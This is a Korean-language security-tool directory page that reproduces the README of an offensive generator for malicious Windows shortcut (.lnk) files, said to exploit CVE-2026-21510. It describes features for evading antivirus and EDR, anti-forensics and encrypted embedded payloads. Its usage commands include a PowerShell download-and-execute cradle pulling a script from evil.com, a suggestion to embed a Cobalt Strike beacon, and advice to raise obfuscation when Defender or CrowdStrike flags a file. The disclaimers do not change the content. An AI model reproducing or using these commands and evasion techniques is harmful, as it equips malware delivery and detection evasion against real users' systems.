Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
EpSiLoNPoInTlnk — CVE-2026-21510을 악용하는 난독화된 .lnk 파일을 생성하며, LNK 스톰핑, 암호화된 페이로드, 그리고 승인된 침투 테스트 및 레드 팀 운영을 위한 안티-포렌식 기능을 제공합니다. | Kitploit
도구/GitHubGitHub/epsilonpointori/epsilonpointlnk
ExploitationWeb Application ExploitationMalware AnalysisPenetration TestingRed TeamingPayload DevelopmentAnti-Bot
GitHubepsilonpointori/epsilonpointlnk

EpSiLoNPoInTlnk

CVE-2026-21510을 악용하는 난독화된 .lnk 파일을 생성하며, LNK 스톰핑, 암호화된 페이로드, 그리고 승인된 침투 테스트 및 레드 팀 운영을 위한 안티-포렌식 기능을 제공합니다.

저장소 보기
23개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

README EpSiLoNPoInTlnk CVE-2026-21510 - .LNK 생성기 CVE-2026-21510(Windows ShellLink 원격 코드 실행) 취약점을 활용하는 .lnk 파일 생성 도구. 공격적 보안 연구, 승인된 침투 테스트, 취약점 분석을 위해 설계되었습니다.

법적 고지 ⚠️ 이 도구는 합법적이고 승인된 용도로만 사용하도록 제작되었습니다. 시스템 또는 네트워크에 대한 무단 사용은 현지 및 국제 법률(예: Computer Fraud and Abuse Act(CFAA), GDPR, 프랑스의 Godfrain 법)을 위반할 수 있습니다. 저자는 오용으로 인한 책임을 지지 않습니다. (아래 면책 조항 참조)

설명 이 생성기는 Windows 바로가기 처리의 취약점인 CVE-2026-21510을 활용하기 위한 난독화된 .lnk 파일을 생성합니다. 다음 기능을 통합합니다:

LNK Stomping(5가지 변형: dot, path_segment, relative, double_extension, unicode)

무작위 CLSID 및 PKEY가 포함된 PropertyStore

KnownFolderDataBlock(무작위 또는 대상 지정 KnownFolderID)

EnvironmentVariableDataBlock(유니코드 난독화, 동적 변수)

난독화(레벨 1-5: TrackerDataBlock, ConsoleDataBlock, 무작위 블록)

내장 및 암호화된 페이로드(AES-256-CBC + XOR)

안티 포렌식(타임스탬프 0, 파일 크기 0, 최소 메타데이터)

EDR/AV 우회(합법적 프로세스, 난독화된 PowerShell 인수)

무작위 변형 생성(서명 회피를 위한 10개 이상의 고유 변형)

사전 요구 사항 시스템 OS: Windows(생성된 .lnk 테스트용) 또는 Linux/macOS(생성용).

Python: ≥ 3.10. 종속성: pip install pycryptodome

권장 도구 분석: PEStudio, Detect It Easy(DIE)

디버그: x64dbg, WinDbg

테스트: 격리된 Windows 가상 머신(예: VirtualBox의 Windows 10/11).

설치 저장소 클론: git clone https://github.com/EpSiLoNPoInT/EpSiLoNPoInTlnk.git cd EpSiLoNPoInTlnk 종속성 설치: pip install -r requirements.txt (선택 사항) 가상 환경 생성: python -m venv venv source venv/bin/activate # Linux/macOS venv\Scripts\activate # Windows

사용법

  1. 기본 생성 python lnkstomperpoint.py --target "C:\Windows\System32\cmd.exe" --args "/c calc.exe" --output exploit.lnk calc.exe를 실행하기 위해 CVE-2026-21510을 사용하는 .lnk를 생성합니다.

  2. 고급 옵션 옵션 설명 기본값 --target 대상 경로(예: C:\Windows\System32\cmd.exe) C:\Windows\System32\cmd.exe --args 대상에 대한 인수(예: /c whoami) /c calc.exe --output .lnk 출력 경로 ./EpSiLoNPoInTlnk_[TIMESTAMP].lnk --working-dir 작업 디렉터리 C:\Windows\System32 --description 바로가기 설명 무작위 문자열 --unc UNC 경로 사용(?\C:...) False --lnk-stomping LNK Stomping 활성화 True --stomping-variant LNK Stomping 변형(dot, path_segment, relative, double_extension, unicode, random) random --obfuscation 불필요한 ExtraData 블록 추가 True --obfuscation-level 난독화 수준(1-5) 5 --embed-payload 내장할 파일 경로(예: payload.bin) None --encrypt-payload 페이로드 암호화(AES-256-CBC + XOR) True --anti-forensics 안티 포렌식 기술 적용 True --randomize-clsid PropertyStore의 CLSID 무작위화 True --randomize-known-folder KnownFolderID 무작위화 True --obfuscate-arguments 인수 난독화(PowerShell) True --generate-variants N개의 무작위 변형 생성 0 --debug 고급 디버그 모드(상세 로그) False

  3. 예제 예제 1: 내장 페이로드가 있는 익스플로잇 python lnkstomperpoint.py
    --target "C:\Windows\System32\cmd.exe"
    --args "/c payload.exe"
    --embed-payload ./malware.bin
    --output exploit_with_payload.lnk
    --obfuscation-level 5
    --anti-forensics 암호화된(AES-256 + XOR) 및 난독화된 페이로드가 있는 .lnk를 생성합니다.

예제 2: 10개의 무작위 변형 생성 python lnkstomperpoint.py
--target "C:\Windows\System32\powershell.exe"
--args "-nop -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://evil.com/shellcode.ps1')"
--generate-variants 10
--output-dir ./variants EDR/AV 서명을 회피하기 위한 10개의 고유 변형을 생성합니다.

예제 3: 최소 모드(테스트용) python lnkstomperpoint.py
--target "C:\Windows\System32\notepad.exe"
--obfuscation False
--anti-forensics False
--output minimal_exploit.lnk 난독화되지 않은 .lnk를 생성합니다(분석 또는 디버그용).

기술 작동 방식

  1. .LNK 구조 생성된 .lnk 파일은 다음 확장 기능과 함께 MS-SHLLINK 사양을 따릅니다:

ShellLink 헤더(0x4C 고정 바이트 + 오프셋): LinkCLSID: 00021401-0000-0000-C000-000000000046(필수). LinkFlags: HasRelativePath, HasWorkingDir, IsUnicode 등을 활성화하도록 구성.

StringData: RelativePath: 대상 경로(활성화된 경우 LNK Stomping 포함). WorkingDir: 작업 디렉터리(예: C:\Windows\System32). Arguments: 난독화된 인수(PowerShell, cmd 등).

ExtraData 블록(중요한 순서): PropertyStoreDataBlock: PKEY_AppUserModel_ID 포함(무작위 CLSID). KnownFolderDataBlock: 시스템 폴더를 가리킴(예: %SystemRoot%). EnvironmentVariableDataBlock: Mark-of-the-Web(MotW) 전에 변수 확장을 강제. 난독화 블록(obfuscation_level에 따라): TrackerDataBlock(레벨 1) ConsoleDataBlock(레벨 2) DarwinDataBlock, ShimDataBlock 등(레벨 3-5)

내장 페이로드(--embed-payload 사용 시): AES-256-CBC + XOR로 암호화.

  1. 우회 기술 기술 설명 영향 LNK Stomping 대상 경로에 보이지 않는 문자(., , \u202e) 추가. 경로 서명 기반 탐지 우회. PropertyStore 알려진 CLSID를 대상으로 하는 YARA/EDR 규칙을 피하기 위해 무작위 CLSID가 있는 PKEY 사용. 알려진 CLSID를 대상으로 하는 YARA/EDR 규칙 회피. KnownFolder 시스템 폴더(%SystemRoot%, %Temp%)를 가리킴. 절대 경로 제한 우회. EnvironmentVariable 변수(%TEMP%, %APPDATA%)로 경로 난독화. 정적 탐지 회피. 난독화 레벨 5 무작위 ExtraData 블록 및 패딩 추가. 정적 분석을 어렵게 만듦. 안티 포렌식 타임스탬프, 파일 크기 등을 0으로 설정. 포렌식 분석을 복잡하게 만듦. 난독화된 인수 PowerShell 기술(Base64, XOR, Reverse) 사용. 악성 명령 탐지 우회.
  2. 페이로드 암호화 --embed-payload가 활성화된 경우:

페이로드는 AES-256-CBC(32바이트 무작위 키, 16바이트 IV)로 암호화됩니다.

AES 키의 처음 16바이트로 XOR 레이어가 적용됩니다.

키와 IV는 추후 복호화를 위해 ShimDataBlock에 저장됩니다.

테스트 및 검증

  1. 자동 검증 생성기에는 다음을 확인하는 _validate() 함수가 포함되어 있습니다:

파일의 최소 크기.

HeaderSize 및 CLSID의 유효성.

필수 LinkFlags의 존재.

ExtraData 블록(PropertyStore, KnownFolder 등)의 구조.

  1. 수동 테스트 정적 분석: PEStudio를 사용하여 .lnk 구조를 확인합니다. ExtraData 블록이 제대로 존재하는지 확인합니다.

실행(격리된 환경에서): .lnk를 두 번 클릭하고 동작을 관찰합니다. Process Monitor(ProcMon)를 사용하여 시스템 호출을 분석합니다.

EDR/AV 탐지: Windows Defender 또는 CrowdStrike와 같은 도구로 테스트합니다. .lnk가 탐지되면 obfuscation_level을 높이거나 일부 옵션을 비활성화합니다.

사용 사례 시나리오 명령 설명 침투 테스트 --target "C:\Windows\System32\cmd.exe" --args "/c whoami" 대상 머신에서 익스플로잇이 작동하는지 확인. Red Team --embed-payload ./cobaltstrike_beacon.bin --obfuscation-level 5 난독화된 Cobalt Strike 페이로드가 있는 .lnk 생성. 연구 --generate-variants 50 --output-dir ./samples EDR 탐지를 테스트하기 위한 50개 변형 생성. 디버그 --debug --obfuscation False .lnk 구조 분석을 위한 상세 로그 표시. 기여 기여를 환영합니다! 기여 방법은 다음과 같습니다:

프로젝트를 Fork합니다.

브랜치를 생성합니다(git checkout -b feature/새-기능).

변경 사항을 커밋합니다(git commit -m "기능 X 추가").

브랜치로 푸시합니다(git push origin feature/새-기능).

Pull Request를 엽니다. 기여 아이디어:

새로운 LNK Stomping 변형 추가.

다른 암호화 알고리즘 구현(예: ChaCha20).

인수 난독화 개선(예: JScript 사용).

.lnk 구조 검증을 위한 단위 테스트 추가.

라이선스 이 프로젝트는 MIT 라이선스 하에 있습니다. 자세한 내용은 LICENSE 파일을 참조하십시오.

면책 조항 🚨 면책 조항

📜 면책 조항(DISCLAIMER)

이 도구를 사용하기 전에 주의 깊게 읽으십시오.

⚠️ 명시적 법적 경고

이 도구의 사용자(이하 "사용자")는 다음 조건을 명시적으로 인지하고 동의합니다:

합법적 사용만 허용

이 도구는 다음을 포함한 합법적이고 승인된 용도로만 사용됩니다:

학술 또는 전문 환경에서의 컴퓨터 보안 연구.

사용자가 소유자의 서면 승인을 받은 시스템에 대한 침투 테스트(pentest).

통제된 환경(예: 보안 연구소, CTF, 승인된 버그 바운티)에서의 취약점 분석.

기타 모든 사용은 엄격히 금지되며, 다음을 포함한 많은 관할권에서 형사 범죄를 구성할 수 있습니다:

프랑스: 1988년 1월 5일 법률 제88-19호(Godfrain 법), 형법 제323-1조 내지 제323-7조(사기성 접근, 데이터 변조 등).

유럽 연합: 정보 시스템에 대한 공격에 관한 지침 2013/40/EU.

미국: Computer Fraud and Abuse Act(CFAA), 18 U.S. Code § 1030.

기타 국가: 해당 지역 법률(예: 영국의 Computer Misuse Act).

보증 부재

저자(EpSiLoNPoInT)는 다음에 대해 명시적 또는 묵시적 보증을 제공하지 않습니다:

이 도구의 신뢰성, 정확성 또는 유용성.

코드의 버그 또는 취약점 부재.

모든 시스템 또는 환경과의 호환성.

도구 사용 중 얻은 결과.

사용자는 다음을 포함하되 이에 국한되지 않는 이 도구 사용과 관련된 모든 위험을 부담합니다:

자신의 시스템 또는 제3자 시스템에 발생한 하드웨어 또는 소프트웨어 손상.

적용 법률 위반 시 법적 결과.

데이터 손실 또는 서비스 중단.

책임 제한

어떠한 경우에도 저자, 기여자 또는 이 도구의 생성, 제작 또는 배포에 관여한 기타 당사자는 다음에 대해 책임을 지지 않습니다:

모든 손해(직접, 간접, 부수적, 특별, 징벌적 또는 결과적 손해)에 대해, 다음을 포함하되 이에 국한되지 않습니다:

이익 손실.

데이터 손실 또는 파일 손상.

평판 손상.

사용자가 받을 수 있는 법적 소송 또는 벌금.

저자가 그러한 손해의 가능성을 통보받았더라도 마찬가지입니다.

법률 및 규정 준수

사용자는 자신의 관할권에서 적용되는 모든 법률, 규정 및 표준을 준수할 것을 약속합니다. 여기에는 다음이 포함되지만 이에 국한되지 않습니다:

데이터 보호법(예: EU의 GDPR).

사이버 보안 및 컴퓨터 사기 관련 법률.

고용주 또는 조직의 보안 정책.

사용자는 이러한 법률 또는 약속 위반으로 인해 발생하는 모든 청구, 손해 또는 비용(법률 비용 포함)으로부터 저자를 면책하고 보호할 것입니다.

악의적 재배포 금지

사용자는 다음을 엄격히 금지합니다:

악의적 목적으로 이 도구를 판매, 임대 또는 재배포.

사이버 범죄 무기(예: 랜섬웨어, 스파이웨어)로 만들기 위한 코드 수정.

명시적 승인 없이 중요 인프라(예: 병원, 정부, 은행)를 대상으로 이 도구 사용.

이 면책 조항을 전달하지 않고 제3자와 이 도구 공유.

제3자에 대한 책임 배제

이 도구는 제3자 라이브러리(예: pycryptodome)와 상호 작용할 수 있습니다.

저자는 이러한 라이브러리의 동작 또는 취약점을 통제하지 않으며 이에 대해 책임을 지지 않습니다.

사용자는 사용된 모든 종속성의 라이선스와 보안을 확인해야 합니다.

사용자 책임 하에 사용

이 도구를 사용함으로써 귀하는 이 조항의 조건을 완전하고 무조건적으로 수락합니다.

이 조건에 동의하지 않는 경우 이 도구를 사용하지 말고 소유한 모든 사본을 즉시 삭제하십시오.

관할권 및 준거법

이 조항은 프랑스 공화국의 법률에 따라 규율되고 해석됩니다.

이 조항 또는 이 도구 사용과 관련하여 발생하는 모든 분쟁은 파리(프랑스) 법원의 전속 관할권에 따릅니다.

🔐 보안 권장 사항

이 도구의 안전하고 합법적인 사용을 위해: ✅ 항상 가상 환경(예: VirtualBox, VMware)에서 테스트를 격리하십시오. ✅ 소유하지 않은 시스템에서 테스트하기 전에 서면 승인을 받으십시오. ✅ 우발적 유출을 방지하기 위해 테스트 머신의 네트워크 연결을 비활성화하십시오. ✅ 동작 분석을 위해 모니터링 도구(예: Wireshark, Process Monitor)를 사용하십시오. ✅ 취약점을 책임감 있게 신고하십시오(예: 버그 바운티 프로그램을 통해). ❌ 승인 없이 프로덕션 시스템에서 테스트하지 마십시오. ❌ 생성된 익스플로잇을 승인되지 않은 사람과 공유하지 마십시오. ❌ 악성 페이로드를 공개적으로 접근 가능한 시스템에 저장하지 마십시오.

📞 연락처

이 도구에 대한 법적 또는 기술적 질문이 있는 경우:

저자: EpSiLoNPoInT

이메일: [email protected]

GitHub: EpSiLoNPoInTOrI

⚠️ 참고: 저자는 이 도구의 불법적 또는 비윤리적 사용에 대한 어떠한 지원도 제공하지 않습니다.

📅 조항 날짜

마지막 업데이트: 2026년 5월 9일 버전: 1.0

도구 다운로드